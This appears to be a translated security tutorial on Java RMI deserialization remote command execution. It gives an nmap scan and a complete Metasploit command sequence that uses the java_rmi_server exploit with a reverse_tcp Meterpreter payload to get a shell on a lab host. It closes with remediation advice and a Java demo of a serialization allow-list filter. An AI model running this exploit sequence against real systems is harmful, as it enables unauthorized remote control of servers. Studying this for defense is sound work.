6-17 vulnerability exploitation - deserialization remote command execution vulnerability
2022-07-25 22:04:00 【Mountain Rabbit 1】

Introduction to Java RMI
Java RMI stands for Remote Method Invocation. It is a mechanism that lets an object on one Java virtual machine call methods on an object living in another Java virtual machine.
RMI is part of J2SE and lets programmers build distributed applications in Java. An RMI object is a remote Java object whose methods can be called from another JVM, even across the Internet. Calling a method on the remote object looks just like calling a method on a local object, so objects spread across different JVMs look and behave as if they were local.

Suppose we have JVM1 and JVM2. Through RMI the two can interact in both directions: JVM1 can call methods on JVM2 and JVM2 can call methods on JVM1.
For any RMI interface that takes an object as a parameter, a caller can send an object it built itself and force the server to deserialize it as any class that exists on the server's class path.
RMI transport is 100% based on serialization: the object is first serialized into a byte stream, sent over the wire, and then deserialized back into an object on the other side. That is how the transfer is achieved.
Detecting RMI on the target
Use nmap -p 1099 -sV <IP address> to detect the target's version information:
nmap -sV -p 1099 192.168.1.106

You can see that nmap detects the version information and the running service here; the service information shows localhost.
In practice you should always run a vulnerability scanner to detect the vulnerability, but here we can use the PoC directly.
Exploiting RMI remote command execution
Use Metasploit to exploit the RMI RCE.
What the Metasploit module actually does is serialize our system command and send it to the RMI service; during transport, the data RMI receives is turned back into a system command. The whole thing works because Metasploit constructs a special object that is executed on the RMI server; once it runs, we get a session on the server. The module we use is the exploit below.
msfconsole
use exploit/multi/misc/java_rmi_server
show options
set rhosts 192.168.1.105
ifconfig
// check the attacker machine's own IP address for LHOST
show payloads
set payload java/meterpreter/reverse_tcp
show options
set lhost 192.168.1.103
// the reverse_tcp payload option is LHOST (single host), not "lhosts"
exploit

sessions -l
sessions -i 1

?
// list the commands available in the session

sysinfo
// view the current system information

ps
// view the current process information

Of course, we can also perform other operations, such as post-exploitation with Metasploit, uploading and downloading files, and so on.
Defense and remediation
1. There is a deserialization transport. Pay particular attention to whether the deserialization vulnerability can be used to execute system commands.
2. There are defective third-party libraries such as commons-collections. Upgrade the library in time, or replace the defective third-party library with another one. This is what we need to do.
3. When setting permissions, pay close attention to whether the Java RMI process has permission to execute system commands, or only part of them. Restricting what the process can execute limits command execution to a certain extent and achieves a defensive effect.
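The two points above, that an Object-typed RMI parameter is deserialized on the server before the method even runs, and that the server should refuse classes it does not expect, can be shown in one small Java program. This is an added example, not code from the original post or from Metasploit: the Echo interface, the Greeting and Unexpected classes, the service name "echo" and the local port 11099 are all constructed for the demo. It uses the JEP 290 serialization filter (Java 9+) passed to UnicastRemoteObject.exportObject, so only classes on an allow-list are accepted as method arguments; anything else is rejected before its readObject can run.

```java
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class RmiFilterDemo {

    // Hypothetical remote interface: an Object-typed parameter means the
    // server deserializes whatever the caller chooses to send.
    public interface Echo extends Remote {
        String echo(Object arg) throws RemoteException;
    }

    // The one parameter type the server legitimately expects.
    public static final class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        Greeting(String text) { this.text = text; }
    }

    // Constructed stand-in for "any other class on the server's class path":
    // its readObject runs inside the server JVM during unmarshalling,
    // before echo() is invoked, unless a filter rejects the class first.
    public static final class Unexpected implements Serializable {
        private static final long serialVersionUID = 1L;
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            System.out.println("[server] Unexpected.readObject ran during unmarshalling");
        }
    }

    static final class EchoImpl implements Echo {
        public String echo(Object arg) {
            return "server saw " + arg.getClass().getName();
        }
    }

    static final int PORT = 11099; // constructed local port for the demo, not the real 1099

    public static void main(String[] args) throws Exception {
        // Allow-list filter: Greeting and java.base classes may be deserialized as
        // parameters of this exported object; every other class is REJECTED.
        ObjectInputFilter allowList = ObjectInputFilter.Config.createFilter(
                "RmiFilterDemo$Greeting;java.base/*;!*");

        Registry registry = LocateRegistry.createRegistry(PORT);
        EchoImpl impl = new EchoImpl();
        Echo stub = (Echo) UnicastRemoteObject.exportObject(impl, 0, allowList);
        registry.rebind("echo", stub);

        // Client side (same process for the demo; the call still goes through a socket
        // and the server unmarshals the argument with the filter applied).
        Echo remote = (Echo) LocateRegistry.getRegistry("localhost", PORT).lookup("echo");
        System.out.println(remote.echo(new Greeting("hello")));   // accepted

        try {
            remote.echo(new Unexpected());                        // rejected by the filter
        } catch (RemoteException e) {
            // The server answers with an UnmarshalException whose cause is
            // InvalidClassException "filter status: REJECTED"; readObject never ran.
            System.out.println("call rejected: " + e.getMessage());
        }

        UnicastRemoteObject.unexportObject(impl, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```

Run it with `java RmiFilterDemo.java` (Java 11+ single-file launcher). The first call prints "server saw RmiFilterDemo$Greeting"; the second prints the rejection and the "[server] ... readObject ran" line never appears. The same allow-list idea can be applied process-wide with the `jdk.serialFilter` system property, and the registry itself has its own filter configured through `sun.rmi.registry.registryFilter`; a library upgrade (point 2 above) removes known gadget chains, while the filter stops unknown classes from being instantiated in the first place.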